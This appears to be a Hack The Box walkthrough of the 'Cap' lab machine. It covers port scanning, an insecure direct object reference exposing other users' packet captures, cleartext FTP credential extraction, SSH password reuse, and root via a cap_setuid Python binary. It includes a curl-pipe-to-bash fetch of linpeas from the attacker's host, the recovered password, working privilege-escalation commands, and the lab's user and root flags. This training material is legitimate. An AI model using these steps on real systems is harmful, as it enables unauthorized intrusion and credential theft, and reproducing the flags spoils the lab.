
HTB: Cap [WriteUp]

Table of Contents

Connect to the HTB server and start the target machine

1.How many TCP ports are open?

2.After running a "Security Snapshot", the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?

3.Are you able to get to other users' scans?

4.What is the ID of the PCAP file that contains sensitive data?

5.Which application layer protocol in the pcap file can the sensitive data be found in?

6.We've managed to collect nathan's FTP password. On what other service does this password work?

7.Submit the flag located in the nathan user's home directory.

USER_FLAG:029a9540b5ee478fe3284a27075330da

8.What is the full path to the binary on this machine that has special capabilities that can be abused to obtain root privileges?

9.Submit the flag located in root's home directory.

ROOT_FLAG:fd175cc81223fb5a4e73a6d0b31579eb


Connect to the HTB server and start the target machine

Target IP: 10.10.10.245

Our assigned VPN IP: 10.10.16.7


1.How many TCP ports are open?

Scan the target's ports with fscan or nmap (fscan with web PoCs, brute forcing and the output file disabled; nmap as a full-range SYN scan, skipping host discovery):

fscan -nopoc -nobr -no -h {TARGET_IP}

nmap -p- -T4 --min-rate=1000 -sS -Pn {TARGET_IP}

Both the fscan and nmap results show three open TCP ports on the target: 21 (FTP), 22 (SSH) and 80 (HTTP), so the answer is 3.


2.After running a "Security Snapshot", the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?

Open the target's URL in a browser; Security Snapshot is in the left-hand menu.

Clicking it runs a capture and redirects the browser to /data/[id], so the [something] is data:


3.Are you able to get to other users' scans?

Click the Network Status button in the left-hand menu:

Scrolling down shows that, besides our own IP (10.10.16.7), there is traffic involving 1.1.1.1, so scans other than ours exist. The [id] in /data/[id] is just a sequential number and is not tied to our session, so other users' scans can be reached simply by changing it (yes).


4.What is the ID of the PCAP file that contains sensitive data?

Click Security Snapshot in the left-hand menu again.

Change the number after data in the URL to 0. Unlike our own (empty) captures, the panel on the right now shows non-zero packet counts per data type, so the scan with sensitive data has ID 0:
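The flaw behind questions 3 and 4 is an insecure direct object reference: /data/[id] is resolved by id alone, with no check that the scan belongs to the requesting user. The following added example (not the Cap application's code) puts such a lookup beside an ownership-checked version and replays the id walk the writeup does by hand. The scan table, the owners admin and nathan, and the packet counts are constructed for illustration.

```python
"""Insecure direct object reference on /data/<id> versus an ownership-checked lookup.

Added example, not the Cap application's code. The scan store, the owners
and the counts are constructed; 'admin' and 'nathan' are hypothetical owners.
"""
import secrets

# Constructed in-memory stand-in for the application's scan table.
# Sequential integer ids: scan 0 is the one with data in it, as in the writeup.
SCANS = {
    0: {"owner": "admin", "pcap": "0.pcap", "packets": 72},
    1: {"owner": "nathan", "pcap": "1.pcap", "packets": 0},
    2: {"owner": "nathan", "pcap": "2.pcap", "packets": 0},
}


def get_scan_vulnerable(scan_id, current_user):
    """Looks the scan up by id only. current_user is ignored, so any client
    that can guess an id can read the scan behind it: an IDOR."""
    return SCANS.get(scan_id)


def get_scan_hardened(scan_id, current_user):
    """Scopes the lookup to the requesting user. A scan that exists but belongs
    to someone else is indistinguishable from one that does not exist, so the
    response cannot be used as an oracle for enumerating other users' ids."""
    scan = SCANS.get(scan_id)
    if scan is None or scan["owner"] != current_user:
        return None
    return scan


def enumerate_scans(lookup, current_user, id_range):
    """Replays the manual id walk under /data/<id>: which ids return data?"""
    return [i for i in id_range if lookup(i, current_user) is not None]


def new_scan_id():
    """Defence in depth: an unguessable handle stops sequential walking, but it
    does not replace the ownership check in get_scan_hardened."""
    return secrets.token_urlsafe(16)


if __name__ == "__main__":
    print("vulnerable:", enumerate_scans(get_scan_vulnerable, "nathan", range(0, 5)))
    print("hardened:  ", enumerate_scans(get_scan_hardened, "nathan", range(0, 5)))
```

With the vulnerable lookup, nathan sees ids 0, 1 and 2 including the admin's scan 0; with the hardened one he sees only 1 and 2, and id 0 looks exactly like the non-existent ids 3 and 4.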


5.Which application layer protocol in the pcap file can the sensitive data be found in?

Scroll to the bottom of the page and click Download in the lower-left corner to save the capture file:

Open the pcap in Wireshark. FTP sends its control channel in cleartext, so the USER and PASS commands of a login are visible in the FTP traffic (the answer is FTP):

Username: nathan

Password: Buck3tH4TF0RM3!
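Wireshark shows the login because FTP has no transport encryption: the password is literally the argument of the PASS command. The following added example (not part of the writeup) does the same extraction without Wireshark, parsing the libpcap record, Ethernet, IPv4 and TCP headers by hand and pairing USER/PASS per client-to-server flow. So that it runs offline, a small capture is constructed inline; the addresses and ports in it are made up, and the credentials mirror the ones recovered above.

```python
"""Pull FTP USER/PASS pairs out of a libpcap capture.

Added example, not from the writeup. The pcap, Ethernet, IPv4 and TCP headers
are parsed directly; a tiny capture is constructed below so the script runs
offline. Addresses and ports are made up.
"""
import struct

PCAP_MAGIC = 0xA1B2C3D4      # little-endian file, microsecond timestamps
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
FTP_PORT = 21


def tcp_payloads(pcap):
    """Yield (src_ip, dst_ip, dst_port, payload) for every TCP segment in a pcap."""
    magic, _major, _minor, _tz, _sig, _snaplen, linktype = struct.unpack("<IHHiIII", pcap[:24])
    if magic != PCAP_MAGIC or linktype != LINKTYPE_ETHERNET:
        raise ValueError("only little-endian Ethernet pcaps are handled here")
    off = 24
    while off + 16 <= len(pcap):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack("<IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4                 # IPv4 header length in bytes
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != IPPROTO_TCP:
            continue
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        data_off = (tcp[12] >> 4) * 4            # TCP header length in bytes
        dst_port = struct.unpack("!H", tcp[2:4])[0]
        yield src, dst, dst_port, tcp[data_off:]


def extract_ftp_credentials(pcap):
    """Pair USER and PASS commands per client->server flow. FTP control traffic
    is cleartext, so the password is simply the argument of PASS."""
    pending_user = {}
    creds = []
    for src, dst, dst_port, payload in tcp_payloads(pcap):
        if dst_port != FTP_PORT or not payload:
            continue
        for line in payload.decode("ascii", "replace").splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() == "USER":
                pending_user[(src, dst)] = arg
            elif cmd.upper() == "PASS" and (src, dst) in pending_user:
                creds.append((pending_user.pop((src, dst)), arg))
    return creds


def _frame(src, dst, sport, dport, payload):
    """Build a minimal Ethernet/IPv4/TCP frame. Checksums are left zero: the
    parser above never verifies them (and Wireshark does not by default)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, IPPROTO_TCP, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip


def _pcap(frames):
    """Wrap frames in a libpcap global header and per-record headers."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1600000000 + i, 0, len(f), len(f)) + f
    return out


# Constructed capture: one FTP login plus an unrelated HTTP request as noise.
SAMPLE_PCAP = _pcap([
    _frame("192.168.196.1", "192.168.196.16", 54321, 21, b"USER nathan\r\n"),
    _frame("192.168.196.16", "192.168.196.1", 21, 54321, b"331 Please specify the password.\r\n"),
    _frame("192.168.196.1", "192.168.196.16", 54321, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
    _frame("192.168.196.1", "192.168.196.16", 54322, 80, b"GET / HTTP/1.1\r\n\r\n"),
])

if __name__ == "__main__":
    for user, password in extract_ftp_credentials(SAMPLE_PCAP):
        print(f"FTP login: {user} / {password}")
```

Running it against the constructed capture yields the single pair nathan / Buck3tH4TF0RM3!; point extract_ftp_credentials at the bytes of 0.pcap downloaded from the target to get the same result the Wireshark view shows.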


6.We've managed to collect nathan's FTP password. On what other service does this password work?

Port 22 (SSH) is open on the target, and the credentials recovered from the capture are a system account, so try them against SSH as well. The login succeeds, so the password is reused for SSH (the answer):

ssh nathan@{TARGET_IP}


7.Submit the flag located in the nathan user's home directory.

Connect to the target's FTP server with the credentials recovered above (nathan's FTP root is his home directory):

ftp {TARGET_IP}

List the files in the FTP directory:

dir

Download user.txt to the local machine:

get user.txt

Display the contents of user.txt:

cat user.txt

USER_FLAG:029a9540b5ee478fe3284a27075330da


8.What is the full path to the binary on this machine that has special capabilities that can be abused to obtain root privileges?

Connect to the target over SSH:

ssh nathan@{TARGET_IP}

On the attacking machine, start Python's http.server module on port 6666 (the port the curl command below uses) in the directory that contains linpeas.sh.

On the target, fetch the script with curl and pipe it straight into bash so it runs without being written to disk ({NATIVE_IP} is our own VPN address, 10.10.16.7 above):

curl http://{NATIVE_IP}:6666/linpeas.sh | bash

Among the findings, linpeas reports that /usr/bin/python3.8 carries the cap_setuid file capability. This is not a SUID bit: a file capability grants the process a specific privilege, and cap_setuid lets the interpreter change the uid of its own process no matter which user started it. That binary, /usr/bin/python3.8, is the answer.
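File capabilities live in the security.capability extended attribute of the binary, which is what getcap -r / 2>/dev/null reads when it prints /usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip. The following added example (not from the writeup or from linpeas) decodes that attribute directly, so the cap_setuid finding can be confirmed, or hunted for, without any external tool. The PYTHON38_CAPS blob is constructed to match the getcap line above; the directory scan reads real files only when the script is run on a Linux host.

```python
"""Decode Linux file capabilities from the security.capability xattr.

Added example, not from the writeup or linpeas. PYTHON38_CAPS is a constructed
blob matching getcap's cap_setuid,cap_net_bind_service+eip; scan_for_caps
reads real files only when run directly on Linux.
"""
import os
import struct
import sys

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001

# Names for the capabilities that matter most for privilege escalation;
# anything else is reported by number as cap_N.
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search", 3: "cap_fowner",
    6: "cap_setgid", 7: "cap_setuid", 8: "cap_setpcap", 10: "cap_net_bind_service",
    13: "cap_net_raw", 16: "cap_sys_module", 19: "cap_sys_ptrace", 21: "cap_sys_admin",
    31: "cap_setfcap",
}


def _names(words):
    """Expand little-endian 32-bit words of a capability set into names."""
    caps = set()
    for idx, word in enumerate(words):
        for bit in range(32):
            if word & (1 << bit):
                n = idx * 32 + bit
                caps.add(CAP_NAMES.get(n, f"cap_{n}"))
    return caps


def decode_vfs_caps(blob):
    """Parse struct vfs_cap_data (linux/capability.h). Revision 1 carries one
    permitted/inheritable word pair, revisions 2 and 3 carry two; revision 3
    appends the root uid of the user namespace the capabilities apply in."""
    (magic_etc,) = struct.unpack_from("<I", blob, 0)
    revision = (magic_etc & VFS_CAP_REVISION_MASK) >> 24
    pairs = 1 if revision == 1 else 2
    words = struct.unpack_from(f"<{2 * pairs}I", blob, 4)
    result = {
        "revision": revision,
        "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": _names(words[0::2]),
        "inheritable": _names(words[1::2]),
    }
    if revision == 3:
        (result["rootid"],) = struct.unpack_from("<I", blob, 4 + 8 * pairs)
    return result


def can_switch_uid(blob):
    """True when cap_setuid is permitted and the effective flag is set, i.e. a
    process running the binary may call setuid(0) without being root."""
    caps = decode_vfs_caps(blob)
    return caps["effective"] and "cap_setuid" in caps["permitted"]


def scan_for_caps(roots):
    """Walk directories and return {path: decoded caps} for files carrying any
    file capability; the xattr is simply absent on ordinary files."""
    found = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    blob = os.getxattr(path, "security.capability", follow_symlinks=False)
                except (OSError, AttributeError):
                    continue  # no caps, unreadable, or not a Linux host
                found[path] = decode_vfs_caps(blob)
    return found


# Constructed blob equal to what getcap prints as cap_setuid,cap_net_bind_service+eip:
# revision 2, effective flag set, bits 7 and 10 in the low permitted and inheritable words.
PYTHON38_CAPS = struct.pack("<IIIII", 0x02000001, (1 << 7) | (1 << 10), (1 << 7) | (1 << 10), 0, 0)

if __name__ == "__main__":
    for path, caps in scan_for_caps(sys.argv[1:] or ["/usr/bin"]).items():
        note = "  <-- can setuid(0)" if can_switch_uid(os.getxattr(path, "security.capability")) else ""
        print(path, sorted(caps["permitted"]), note)
```

Run as python3 filecaps.py /usr/bin /usr/sbin on the target to list every capability-bearing binary; only entries with cap_setuid (or cap_setgid, cap_dac_override and the like) in the effective set are direct privilege-escalation candidates, which is why the next step works with python3.8.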


9.Submit the flag located in root's home directory.

Start the capability-bearing interpreter:

/usr/bin/python3.8

Import the os module:

import os

Set the current process's uid to root (0). This succeeds without being root because cap_setuid is in the process's effective capability set:

os.setuid(0)

Spawn a shell from the now-root process; privilege escalation succeeded:

os.system("/bin/bash")

Locate root.txt:

find / -name 'root.txt' 2>/dev/null

Display the contents of root.txt:

cat /root/root.txt

ROOT_FLAG:fd175cc81223fb5a4e73a6d0b31579eb
